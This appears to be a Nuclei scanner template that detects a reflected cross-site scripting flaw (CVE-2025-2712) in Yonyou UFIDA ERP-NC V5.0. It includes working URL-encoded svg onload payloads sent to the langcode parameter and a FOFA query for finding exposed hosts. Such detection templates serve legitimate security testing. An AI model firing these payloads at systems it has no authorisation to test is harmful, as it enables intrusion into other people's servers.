info: name: Yonyou UFIDA ERP-NC V5.0- Cross-Site Scripting author: ritikchaddha severity: medium description: | Yonyou UFIDA ERP-NC V5.0 is vulnerable to reflected cross-site scripting (XSS) via the langcode parameter in/help/systop.jsp and /help/top.jsp. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution. reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-2712 classification: cve-id: CVE-2025-2712 cwe-id: CWE-79 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score:6.1 cpe: cpe:2.3:a:yonyou:ufida_erp-nc:5.0:*:*:*:*:*:*:* metadata: verified:true max-request:4 vendor: yonyou product: ufida_erp-nc fofa-query: icon_hash="1085941792" tags: cve,cve2025,xss,erp-nc,ufida,yonyou
http: -method: GET path: -"{{BaseURL}}/help/top.jsp?langcode=1%22%3E%3Csvg%20onload=alert(document.domain)%3E" -"{{BaseURL}}/help/top.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(document.domain)%3E"
stop-at-first-match:true matchers-condition: and matchers: -type: word part: body words: - '<svg onload=alert(document.domain)>.png)' - 'Search.jsp' condition: and
-type: word part: content_type words: - 'text/html'